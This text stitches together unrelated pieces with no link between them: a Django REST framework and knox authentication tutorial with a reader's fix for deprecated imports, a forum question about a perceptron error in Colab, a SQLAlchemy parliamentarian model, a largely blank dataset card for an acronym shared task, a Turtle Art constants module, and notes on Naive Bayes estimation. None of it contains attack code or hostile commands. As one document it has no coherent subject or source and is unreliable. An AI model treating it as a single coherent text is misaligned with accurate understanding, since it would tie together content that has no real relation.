serializer.save(owner=self.request.user)
Now, let's implement the registration and login APIs.
notes/serializers.py
from rest_framework import serializers
from .models import Notes
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
...
# Registration serializer
class CreateUserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "username", "password")
extra_kwargs = {"password": {"write_only": True}}
def create(self, validated_data):
user = User.objects.create_user(
validated_data["username"], None, validated_data["password"]
)
return user
# Serializer used to check whether the user is still logged in
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "username")
# Login serializer
class LoginUserSerializer(serializers.Serializer):
username = serializers.CharField()
password = serializers.CharField()
def validate(self, data):
user = authenticate(**data)
if user and user.is_active:
return user
raise serializers.ValidationError("Unable to log in with provided credentials.")
With the serializers created as above,
notes/views.py
from rest_framework import viewsets, permissions, generics, status
from rest_framework.response import Response
from .models import Notes
from .serializers import (
NoteSerializer,
CreateUserSerializer,
UserSerializer,
LoginUserSerializer,
)
from knox.models import AuthToken
....
class RegistrationAPI(generics.GenericAPIView):
serializer_class = CreateUserSerializer
def post(self, request, *args, **kwargs):
if len(request.data["username"]) < 6 or len(request.data["password"]) < 4:
body = {"message": "short field"}
return Response(body, status=status.HTTP_400_BAD_REQUEST)
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.save()
return Response(
{
"user": UserSerializer(
user, context=self.get_serializer_context()
).data,
"token": AuthToken.objects.create(user),
}
)
class LoginAPI(generics.GenericAPIView):
serializer_class = LoginUserSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.validated_data
return Response(
{
"user": UserSerializer(
user, context=self.get_serializer_context()
).data,
"token": AuthToken.objects.create(user),
}
)
class UserAPI(generics.RetrieveAPIView):
permission_classes = [permissions.IsAuthenticated]
serializer_class = UserSerializer
def get_object(self):
return self.request.user
we create the views as well.
notes/urls.py
from django.conf.urls import url
from .views import NoteViewSet, RegistrationAPI, LoginAPI, UserAPI
note_list = NoteViewSet.as_view({"get": "list", "post": "create"})
note_detail = NoteViewSet.as_view(
{"get": "retrieve", "patch": "partial_update", "delete": "destroy"}
)
urlpatterns = [
url("^notes/$", note_list, name="note-list"),
url("^notes/(?P<pk>[0-9]+)/$", note_detail, name="note-detail"),
url("^auth/register/$", RegistrationAPI.as_view()),
url("^auth/login/$", LoginAPI.as_view()),
url("^auth/user/$", UserAPI.as_view()),
]
Once the URL routing is set up like this, the Django-side work is done.
In Postman, set the request body to raw -> JSON and enter:
{
"username": "testing",
"password": "1234"
}
Send this as a POST request to http://localhost:8000/api/auth/register/ and to http://localhost:8000/api/auth/login/, and both should succeed.
To see the currently logged-in user's information, send a GET request to http://localhost:8000/api/auth/user/ with an Authorization header containing "token <token value>", and the user information will be returned.
Finally, implementing logout is simple.
d_note/urls.py
from django.contrib import admin
from django.urls import path
from notes import urls
from django.conf.urls import include, url
urlpatterns = [
path("admin/", admin.site.urls),
url(r"^api/", include(urls)),
url(r"^api/auth", include("knox.urls")),
]
With this configuration, sending a request to /api/auth/logout/ with an "Authorization: token <token value>" header logs the user out.
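For reference, the same flow can also be exercised outside Postman. A minimal sketch using the requests library (the base URL and credentials are examples, and it assumes the LoginAPI above returns the token as a plain string under the "token" key):
import requests

BASE = "http://localhost:8000/api"
creds = {"username": "testing", "password": "1234"}

# register, then log in to obtain a knox token
requests.post(BASE + "/auth/register/", json=creds)
token = requests.post(BASE + "/auth/login/", json=creds).json()["token"]

# authenticated requests carry the token in the Authorization header
headers = {"Authorization": "token " + token}
print(requests.get(BASE + "/auth/user/", headers=headers).json())

# logging out invalidates the token
requests.post(BASE + "/auth/logout/", headers=headers)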
(Reader comment) While following along with the post, I'm noting a part that throws an error.
...
from django.urls import path
...
from django.conf.urls import include, url   <-- no longer available in newer Django versions
Change this part to
from django.urls import path, include
this single line, and stop using the url() calls below. If you need regular-expression routes, import re_path as well and use that.
urlpatterns = [
path("admin/", admin.site.urls),
url(r"^api/", include(urls)),
url(r"^api/auth", include("knox.urls")),
]
And this part
urlpatterns = [
path("admin/", admin.site.urls),
path("api/", include(urls)),
path("api/auth", include("knox.urls")),
]
should be changed like this.
|
Hi, I am getting the error below when I execute the code in Google Colab.
0.947265625
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-149-3d91d5365e49> in <module>()
----> 1 wt_matrix = perceptron.fit(X_train, Y_train, 10000)
8 frames
/usr/local/lib/python3.6/dist-packages/numpy/core/_asarray.py in asarray(a, dtype, order)
83
84 """
---> 85 return array(a, dtype, copy=False, order=order)
86
87
TypeError: float() argument must be a string or a number, not 'dict_values'
Below is the code
class Perceptron:
def __init__ (self):
self.w = None
self.b = None
def model(self, x):
return 1 if (np.dot(self.w, x) >= self.b) else 0
def predict(self, X):
Y = []
for x in X:
result = self.model(x)
Y.append(result)
return np.array(Y)
def fit(self, X, Y, epochs = 1, lr = 1):
self.w = np.ones(X.shape[1])
self.b = 0
accuracy = {}
max_accuracy = 0
wt_matrix = []
for i in range(epochs):
for x, y in zip(X, Y):
y_pred = self.model(x)
if y == 1 and y_pred == 0:
self.w = self.w + lr * x
self.b = self.b - lr * 1
elif y == 0 and y_pred == 1:
self.w = self.w - lr * x
self.b = self.b + lr * 1
wt_matrix.append(self.w)
accuracy[i] = accuracy_score(self.predict(X), Y)
if (accuracy[i] > max_accuracy):
max_accuracy = accuracy[i]
chkptw = self.w
chkptb = self.b
self.w = chkptw
self.b = chkptb
print(max_accuracy)
plt.plot(accuracy.values())
plt.ylim([0, 1])
plt.show()
return np.array(wt_matrix)
perceptron = Perceptron()
wt_matrix = perceptron.fit(X_train, Y_train, 10000,0.01)
|
# -*- coding: utf-8 -*-
import enum
from .constants import CHAMBRES, ETAPES, SEXES
from .database import db
class Parlementaire(db.Model):
__tablename__ = 'parlementaires'
id = db.Column(db.Integer, primary_key=True)
nom = db.Column(db.Unicode)
prenom = db.Column(db.Unicode)
sexe = db.Column(db.Enum(*SEXES.keys(), name='sexes'))
adresse = db.Column(db.Unicode)
chambre = db.Column(db.Enum(*CHAMBRES.keys(), name='chambres'))
mandat_debut = db.Column(db.DateTime)
mandat_fin = db.Column(db.DateTime)
num_deptmt = db.Column(db.Integer)
nom_circo = db.Column(db.Unicode)
num_circo = db.Column(db.Integer)
groupe = db.Column(db.Unicode)
groupe_sigle = db.Column(db.Unicode)
url_photo = db.Column(db.Unicode)
url_rc = db.Column(db.Unicode)
url_off = db.Column(db.Unicode)
etat = db.Column(db.Enum(*ETAPES.keys(), name='etapes'))
|
Dataset Card Creation Guide
Table of Contents
Dataset Description
Dataset Structure
Dataset Creation
Considerations for Using the Data
Additional Information
Dataset Description
Homepage:https://sites.google.com/view/sdu-aaai21/shared-task
Repository:https://github.com/amirveyseh/AAAI-21-SDU-shared-task-1-AI
Paper:https://arxiv.org/pdf/2010.14678v1.pdf
Leaderboard:https://competitions.codalab.org/competitions/26609
Point of Contact:[More Information Needed]
Dataset Summary
[More Information Needed]
Supported Tasks and Leaderboards
[More Information Needed]
Languages
[More Information Needed]
Dataset Structure
Data Instances
A sample instance from the training set is provided below.
{'id': 'TR-0',
'labels': [4, 4, 4, 4, 0, 2, 2, 4, 1, 4, 4, 4, 4, 4, 4, 4, 4, 4],
'tokens': ['What',
'is',
'here',
'called',
'controlled',
'natural',
'language',
'(',
'CNL',
')',
'has',
'traditionally',
'been',
'given',
'many',
'different',
'names',
'.']}
Please note that in the test set only id and tokens are available; labels can be ignored for the test set. Labels in the test set are all O.
Data Fields
[More Information Needed]
Data Splits
[More Information Needed]
Dataset Creation
Curation Rationale
[More Information Needed]
Source Data
[More Information Needed]
Initial Data Collection and Normalization
[More Information Needed]
Who are the source language producers?
[More Information Needed]
Annotations
[More Information Needed]
Annotation process
[More Information Needed]
Who are the annotators?
[More Information Needed]
Personal and Sensitive Information
[More Information Needed]
Considerations for Using the Data
Social Impact of Dataset
[More Information Needed]
Discussion of Biases
[More Information Needed]
Other Known Limitations
[More Information Needed]
Additional Information
Dataset Curators
[More Information Needed]
Licensing Information
[More Information Needed]
Citation Information
[More Information Needed]
|
# -*- coding: utf-8 -*-
#Copyright (c) 2010-11 Walter Bender
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
from gettext import gettext as _
#
# Sprite layers
#
HIDE_LAYER = 100
CANVAS_LAYER = 500
OVERLAY_LAYER = 525
TURTLE_LAYER = 550
BLOCK_LAYER = 600
CATEGORY_LAYER = 700
TAB_LAYER = 710
STATUS_LAYER = 900
TOP_LAYER = 1000
# Special-case some block colors
BOX_COLORS = {'red': ["#FF0000", "#A00000"],
'orange': ["#FFD000", "#AA8000"],
'yellow': ["#FFFF00", "#A0A000"],
'blue': ["#0000FF", "#000080"],
'cyan': ["#00FFFF", "#00A0A0"],
'green': ["#00FF00", "#008000"],
'purple': ["#FF00FF", "#A000A0"],
'white': ["#FFFFFF", "#A0A0A0"],
'black': ["#000000", "#000000"]}
#
# Misc. parameters
#
PALETTE_HEIGHT = 120
PALETTE_WIDTH = 175
SELECTOR_WIDTH = 55
ICON_SIZE = 55
GRADIENT_COLOR = "#FFFFFF"
STANDARD_STROKE_WIDTH = 1.0
BLOCK_SCALE = [0.5, 1.0, 1.5, 2.0, 3.0, 4.0, 6.0, 8.0]
PALETTE_SCALE = 1.5
DEFAULT_TURTLE = 'Yertle'
DEFAULT_TURTLE_COLORS = ['#008000', '#00A000']
HORIZONTAL_PALETTE = 0
VERTICAL_PALETTE = 1
BLACK = -9999
WHITE = -9998
HIT_HIDE = 248
HIT_SHOW = 240
HIT_RED = "#F80000"
HIT_GREEN = "#00F000"
HIDE_WHITE = "#F8F8F8"
SHOW_WHITE = "#F0F0F0"
DEFAULT_SCALE = 33
XO1 = 'xo1'
XO15 = 'xo1.5'
UNKNOWN = 'unknown'
CONSTANTS = {'leftpos': None, 'toppos': None, 'rightpos': None,
'bottompos': None, 'width': None, 'height': None, 'red': 0,
'orange': 10, 'yellow': 20, 'green': 40, 'cyan': 50, 'blue': 70,
'purple': 90, 'titlex': None, 'titley': None, 'leftx': None,
'topy': None, 'rightx': None, 'bottomy': None}
#
# Blocks that are expandable
#
EXPANDABLE_STYLE = ['boolean-style', 'compare-porch-style', 'compare-style',
'number-style-porch', 'number-style', 'basic-style-2arg']
EXPANDABLE = ['vspace', 'hspace', 'identity2']
EXPANDABLE_ARGS = ['list', 'myfunc1arg', 'myfunc2arg',
'myfunc3arg', 'userdefined', 'userdefined2args',
'userdefined3args']
#
# Blocks that are 'collapsible'
#
COLLAPSIBLE = ['sandwichbottom', 'sandwichcollapsed']
#
# Deprecated block styles that need dock adjustments
#
OLD_DOCK = ['and', 'or', 'plus', 'minus', 'division', 'product', 'remainder']
#
# These blocks get a special skin
#
BLOCKS_WITH_SKIN = ['journal', 'audio', 'description', 'nop', 'userdefined',
'video', 'userdefined2args', 'userdefined3args', 'camera']
PYTHON_SKIN = ['nop', 'userdefined', 'userdefined2args', 'userdefined3args']
#
# Blocks that can interchange strings and numbers for their arguments
#
STRING_OR_NUMBER_ARGS = ['plus2', 'equal2', 'less2', 'greater2', 'box',
'template1x1', 'template1x2', 'template2x1', 'list',
'template2x2', 'template1x1a', 'templatelist', 'nop',
'print', 'stack', 'hat', 'addturtle', 'myfunc',
'myfunc1arg', 'myfunc2arg', 'myfunc3arg', 'comment',
'sandwichtop', 'sandwichtop_no_arm', 'userdefined',
'userdefined2args', 'userdefined3args', 'storein']
CONTENT_ARGS = ['show', 'showaligned', 'push', 'storein', 'storeinbox1',
'storeinbox2']
PREFIX_DICTIONARY = {'journal': '#smedia_', 'description': '#sdescr_',
'audio': '#saudio_', 'video': '#svideo_'}
#
# Status blocks
#
MEDIA_SHAPES = ['audiooff', 'audioon', 'audiosmall',
'videooff', 'videoon', 'videosmall',
'cameraoff', 'camerasmall',
'journaloff', 'journalon', 'journalsmall',
'descriptionoff', 'descriptionon', 'descriptionsmall',
'pythonoff', 'pythonon', 'pythonsmall',
'list', '1x1', '1x1a', '2x1', '1x2', '2x2']
OVERLAY_SHAPES = ['Cartesian', 'Cartesian_labeled', 'polar']
STATUS_SHAPES = ['status', 'info', 'nostack', 'dupstack', 'noinput',
'emptyheap', 'emptybox', 'nomedia', 'nocode', 'overflowerror',
'negroot', 'syntaxerror', 'nofile', 'nojournal', 'zerodivide',
'notanumber', 'incompatible']
#
# Emulate Sugar toolbar when running from outside of Sugar
#
TOOLBAR_SHAPES = ['hideshowoff', 'eraseron', 'run-fastoff',
'run-slowoff', 'debugoff', 'stopiton']
#
# Legacy names
#
OLD_NAMES = {'product': 'product2', 'storeinbox': 'storein', 'minus': 'minus2',
'division': 'division2', 'plus': 'plus2', 'and': 'and2',
'or': 'or2', 'less': 'less2', 'greater': 'greater2',
'equal': 'equal2', 'remainder': 'remainder2',
'identity': 'identity2', 'division': 'division2',
'audiooff': 'audio', 'endfill': 'stopfill',
'descriptionoff': 'description', 'template3': 'templatelist',
'template1': 'template1x1', 'template2': 'template2x1',
'template6': 'template1x2', 'template7': 'template2x2',
'template4': 'template1x1a', 'hres': 'width', 'vres': 'height',
'sandwichtop2': 'sandwichtop', 'image': 'show',
'container': 'indentity2', 'insertimage': 'show'}
#
# Define the relative size and postion of media objects
# (w, h, x, y, dx, dy)
#
TITLEXY = (0.9375, 0.875)
#
# Relative placement of portfolio objects (used by deprecated blocks)
#
TEMPLATES = {'t1x1': (0.5, 0.5, 0.0625, 0.125, 1.05, 0),
't2z1': (0.5, 0.5, 0.0625, 0.125, 1.05, 1.05),
't1x2': (0.45, 0.45, 0.0625, 0.125, 1.05, 1.05),
't2x2': (0.45, 0.45, 0.0625, 0.125, 1.05, 1.05),
't1x1a': (0.9, 0.9, 0.0625, 0.125, 0, 0),
'bullet': (1, 1, 0.0625, 0.125, 0, 0.1),
'insertimage': (0.333, 0.333)}
#
# 'dead key' Unicode dictionaries
#
DEAD_KEYS = ['grave', 'acute', 'circumflex', 'tilde', 'diaeresis', 'abovering']
DEAD_DICTS = [{'A': 192, 'E': 200, 'I': 204, 'O': 210, 'U': 217, 'a': 224,
'e': 232, 'i': 236, 'o': 242, 'u': 249},
{'A': 193, 'E': 201, 'I': 205, 'O': 211, 'U': 218, 'a': 225,
'e': 233, 'i': 237, 'o': 243, 'u': 250},
{'A': 194, 'E': 202, 'I': 206, 'O': 212, 'U': 219, 'a': 226,
'e': 234, 'i': 238, 'o': 244, 'u': 251},
{'A': 195, 'O': 211, 'N': 209, 'U': 360, 'a': 227, 'o': 245,
'n': 241, 'u': 361},
{'A': 196, 'E': 203, 'I': 207, 'O': 211, 'U': 218, 'a': 228,
'e': 235, 'i': 239, 'o': 245, 'u': 252},
{'A': 197, 'a': 229}]
NOISE_KEYS = ['Shift_L', 'Shift_R', 'Control_L', 'Caps_Lock', 'Pause',
'Alt_L', 'Alt_R', 'KP_Enter', 'ISO_Level3_Shift', 'KP_Divide',
'Escape', 'Return', 'KP_Page_Up', 'Up', 'Down', 'Menu',
'Left', 'Right', 'KP_Home', 'KP_End', 'KP_Up', 'Super_L',
'KP_Down', 'KP_Left', 'KP_Right', 'KP_Page_Down', 'Scroll_Lock',
'Page_Down', 'Page_Up']
WHITE_SPACE = ['space', 'Tab']
CURSOR = '█'
RETURN = '⏎'
#
# Macros (groups of blocks)
#
MACROS = {
'until':
[[0, 'forever', 0, 0, [None, 2, 1]],
[1, 'vspace', 0, 0, [0, None]],
[2, 'ifelse', 0, 0, [0, None, 3, None, None]],
[3, 'vspace', 0, 0, [2, 4]],
[4, 'stopstack', 0, 0, [3, None]]],
'while':
[[0, 'forever', 0, 0, [None, 2, 1]],
[1, 'vspace', 0, 0, [0, None]],
[2, 'ifelse', 0, 0, [0, None, 3, 4, None]],
[3, 'vspace', 0, 0, [2, None]],
[4, 'stopstack', 0, 0, [2, None]]],
'kbinput':
[[0, 'forever', 0, 0, [None, 1, None]],
[1, 'kbinput', 0, 0, [0, 2]],
[2, 'vspace', 0, 0, [1, 3]],
[3, 'if', 0, 0, [2, 4, 7, 8]],
[4, 'greater2', 0, 0, [3, 5, 6, None]],
[5, 'keyboard', 0, 0, [4, None]],
[6, ['number', '0'], 0, 0, [4, None]],
[7, 'stopstack', 0, 0, [3, None]],
[8, 'vspace', 0, 0, [3, 9]],
[9, 'wait', 0, 0, [8, 10, None]],
[10, ['number', '1'], 0, 0, [9, None]]],
'picturelist':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'penup', 0, 0, [8, 11]],
[11, 'setxy2', 0, 0, [10, 12, 13, 14]],
[12, 'leftx', 0, 0, [11, None]],
[13, 'topy', 0, 0, [11, None]],
[14, 'pendown', 0, 0, [11, 15]],
[15, 'setscale', 0, 0, [14, 16, 17]],
[16, ['number', '67'], 0, 0, [15, None]],
[17, 'list', 0, 0, [15, 18, 19, 20]],
[18, ['string', '∙ '], 0, 0, [17, None]],
[19, ['string', '∙ '], 0, 0, [17, None]],
[20, 'sandwichbottom', 0, 0, [17, None]]],
'picture1x1a':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'penup', 0, 0, [8, 11]],
[11, 'setxy2', 0, 0, [10, 12, 13, 14]],
[12, 'leftx', 0, 0, [11, None]],
[13, 'topy', 0, 0, [11, None]],
[14, 'pendown', 0, 0, [11, 15]],
[15, 'setscale', 0, 0, [14, 16, 17]],
[16, ['number', '90'], 0, 0, [15, None]],
[17, 'showaligned', 0, 0, [15, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'sandwichbottom', 0, 0, [17, None]]],
'picture2x2':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'setscale', 0, 0, [8, 11, 12]],
[11, ['number', '35'], 0, 0, [10, None]],
[12, 'penup', 0, 0, [10, 13]],
[13, 'setxy2', 0, 0, [12, 14, 15, 16]],
[14, 'leftx', 0, 0, [13, None]],
[15, 'topy', 0, 0, [13, None]],
[16, 'pendown', 0, 0, [13, 17]],
[17, 'showaligned', 0, 0, [16, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'penup', 0, 0, [17, 20]],
[20, 'setxy2', 0, 0, [19, 21, 22, 23]],
[21, 'rightx', 0, 0, [20, None]],
[22, 'topy', 0, 0, [20, None]],
[23, 'pendown', 0, 0, [20, 24]],
[24, 'showaligned', 0, 0, [23, 25, 26]],
[25, 'journal', 0, 0, [24, None]],
[26, 'penup', 0, 0, [24, 27]],
[27, 'setxy2', 0, 0, [26, 28, 29, 30]],
[28, 'leftx', 0, 0, [27, None]],
[29, 'bottomy', 0, 0, [27, None]],
[30, 'pendown', 0, 0, [27, 31]],
[31, 'showaligned', 0, 0, [30, 32, 33]],
[32, 'journal', 0, 0, [31, None]],
[33, 'penup', 0, 0, [31, 34]],
[34, 'setxy2', 0, 0, [33, 35, 36, 37]],
[35, 'rightx', 0, 0, [34, None]],
[36, 'bottomy', 0, 0, [34, None]],
[37, 'pendown', 0, 0, [34, 38]],
[38, 'showaligned', 0, 0, [37, 39, 40]],
[39, 'journal', 0, 0, [38, None]],
[40, 'sandwichbottom', 0, 0, [38, None]]],
'picture1x2':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'setscale', 0, 0, [8, 11, 12]],
[11, ['number', '35'], 0, 0, [10, None]],
[12, 'penup', 0, 0, [10, 13]],
[13, 'setxy2', 0, 0, [12, 14, 15, 16]],
[14, 'leftx', 0, 0, [13, None]],
[15, 'topy', 0, 0, [13, None]],
[16, 'pendown', 0, 0, [13, 17]],
[17, 'showaligned', 0, 0, [16, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'penup', 0, 0, [17, 20]],
[20, 'setxy2', 0, 0, [19, 21, 22, 23]],
[21, 'rightx', 0, 0, [20, None]],
[22, 'topy', 0, 0, [20, None]],
[23, 'pendown', 0, 0, [20, 24]],
[24, 'showaligned', 0, 0, [23, 25, 26]],
[25, 'description', 0, 0, [24, None]],
[26, 'penup', 0, 0, [24, 27]],
[27, 'setxy2', 0, 0, [26, 28, 29, 30]],
[28, 'leftx', 0, 0, [27, None]],
[29, 'bottomy', 0, 0, [27, None]],
[30, 'pendown', 0, 0, [27, 31]],
[31, 'showaligned', 0, 0, [30, 32, 33]],
[32, 'journal', 0, 0, [31, None]],
[33, 'penup', 0, 0, [31, 34]],
[34, 'setxy2', 0, 0, [33, 35, 36, 37]],
[35, 'rightx', 0, 0, [34, None]],
[36, 'bottomy', 0, 0, [34, None]],
[37, 'pendown', 0, 0, [34, 38]],
[38, 'showaligned', 0, 0, [37, 39, 40]],
[39, 'description', 0, 0, [38, None]],
[40, 'sandwichbottom', 0, 0, [38, None]]],
'picture2x1':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'setscale', 0, 0, [8, 11, 12]],
[11, ['number', '35'], 0, 0, [10, None]],
[12, 'penup', 0, 0, [10, 13]],
[13, 'setxy2', 0, 0, [12, 14, 15, 16]],
[14, 'leftx', 0, 0, [13, None]],
[15, 'topy', 0, 0, [13, None]],
[16, 'pendown', 0, 0, [13, 17]],
[17, 'showaligned', 0, 0, [16, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'penup', 0, 0, [17, 20]],
[20, 'setxy2', 0, 0, [19, 21, 22, 23]],
[21, 'rightx', 0, 0, [20, None]],
[22, 'topy', 0, 0, [20, None]],
[23, 'pendown', 0, 0, [20, 24]],
[24, 'showaligned', 0, 0, [23, 25, 26]],
[25, 'journal', 0, 0, [24, None]],
[26, 'penup', 0, 0, [24, 27]],
[27, 'setxy2', 0, 0, [26, 28, 29, 30]],
[28, 'leftx', 0, 0, [27, None]],
[29, 'bottomy', 0, 0, [27, None]],
[30, 'pendown', 0, 0, [27, 31]],
[31, 'showaligned', 0, 0, [30, 32, 33]],
[32, 'description', 0, 0, [31, None]],
[33, 'penup', 0, 0, [31, 34]],
[34, 'setxy2', 0, 0, [33, 35, 36, 37]],
[35, 'rightx', 0, 0, [34, None]],
[36, 'bottomy', 0, 0, [34, None]],
[37, 'pendown', 0, 0, [34, 38]],
[38, 'showaligned', 0, 0, [37, 39, 40]],
[39, 'description', 0, 0, [38, None]],
[40, 'sandwichbottom', 0, 0, [38, None]]],
'picture1x1':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'setscale', 0, 0, [8, 11, 12]],
[11, ['number', '35'], 0, 0, [10, None]],
[12, 'penup', 0, 0, [10, 13]],
[13, 'setxy2', 0, 0, [12, 14, 15, 16]],
[14, 'leftx', 0, 0, [13, None]],
[15, 'topy', 0, 0, [13, None]],
[16, 'pendown', 0, 0, [13, 17]],
[17, 'showaligned', 0, 0, [16, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'penup', 0, 0, [17, 20]],
[20, 'setxy2', 0, 0, [19, 21, 22, 23]],
[21, 'rightx', 0, 0, [20, None]],
[22, 'topy', 0, 0, [20, None]],
[23, 'pendown', 0, 0, [20, 24]],
[24, 'showaligned', 0, 0, [23, 25, 26]],
[25, 'description', 0, 0, [24, None]],
[26, 'sandwichbottom', 0, 0, [24, None]]],
'reskin':
[[0, 'skin', 0, 0, [None, 1, None]],
[1, 'journal', 0, 0, [0, None]]]}
|
These notes are from Chapter 4 of 《统计学习方法》 (Statistical Learning Methods).
Overview
Pros and cons of Naive Bayes
Advantages:
The Naive Bayes model originates from classical mathematical theory, has a solid mathematical foundation, and offers stable classification performance.
The NBC model requires very few estimated parameters, is not very sensitive to missing data, and the algorithm is relatively simple.
Disadvantages:
In theory, the NBC model has the smallest error rate compared with other classification methods. In practice this is not always the case, because the NBC model assumes that attributes are mutually independent, an assumption that often does not hold in real applications (one remedy is to first cluster strongly correlated attributes), and this affects classification accuracy. When the number of attributes is large or the attributes are strongly correlated, the NBC model's classification performance is inferior to decision trees; when attribute correlation is small, the NBC model performs best.
The prior probabilities must be known.
Classification decisions carry a nonzero error rate.
Naive Bayes
Joint probability distribution
The joint probability distribution can be obtained from the prior probability and the conditional probability:
$$ P(X,Y)=P(Y)P(X|Y) $$
In other words, once the prior distribution $P(Y)$ and the conditional distribution $P(X|Y)$ are known, the joint distribution can be computed; both the prior and the conditional distribution can be obtained by maximum likelihood estimation or Bayesian estimation.
Maximum likelihood estimation
Maximum likelihood estimation estimates the probability of an event from the frequency with which it occurs:
$$ \Large{{P(Y=c_k)=\frac{\sum_{i=1}^{N} I(y_i=c_k)}{N}}}\\ \Large{P(X^{(j)}=a_{jl}|Y=c_k)=\frac{\sum_{i=1}^{N} I(x_i^{(j)}=a_{jl},y_i=c_k)}{\sum_{i=1}^N I(y_i=c_k)}} $$
Bayesian estimation
With probabilities obtained by maximum likelihood estimation, a probability of zero breaks the computation of the posterior probability (the denominator must not be zero).
Assigning a positive number $\lambda>0$ to the frequency count of each value of the random variable avoids this problem:
$$ \Large{{P(Y=c_k)=\frac{\sum_{i=1}^{N} I(y_i=c_k)+\lambda}{N+K\lambda}}}\\ \Large{P(X^{(j)}=a_{jl}|Y=c_k)=\frac{\sum_{i=1}^{N} I(x_i^{(j)}=a_{jl},y_i=c_k)+\lambda}{\sum_{i=1}^N I(y_i=c_k)+S_j\lambda}} $$
Here, $\lambda=0$ gives maximum likelihood estimation and $\lambda=1$ gives Laplace smoothing; the indices run over $l=1,2,...,S_j$ and $k=1,2,...,K$, where $S_j$ is the number of possible values of the $j$-th feature.
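As a quick numerical illustration (the counts below are made up, not taken from the book's example), the smoothed estimates can be computed directly from frequency counts:
import numpy as np

# hypothetical counts of feature value a_jl occurring together with class c_k (S_j = 3 possible values)
count_joint = np.array([0, 3, 2])
count_class = count_joint.sum()          # number of samples with y = c_k
lam = 1.0                                # lambda = 1 -> Laplace smoothing
S_j = len(count_joint)

mle = count_joint / count_class                            # first value gets probability 0
smoothed = (count_joint + lam) / (count_class + S_j * lam)
print(mle)        # [0.  0.6 0.4]
print(smoothed)   # [0.125 0.5   0.375]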
The Naive Bayes method
Once we can estimate these probabilities, we can compute each $P(Y=c_k|X=x)$ and take the class $Y$ with the largest posterior probability as the prediction.
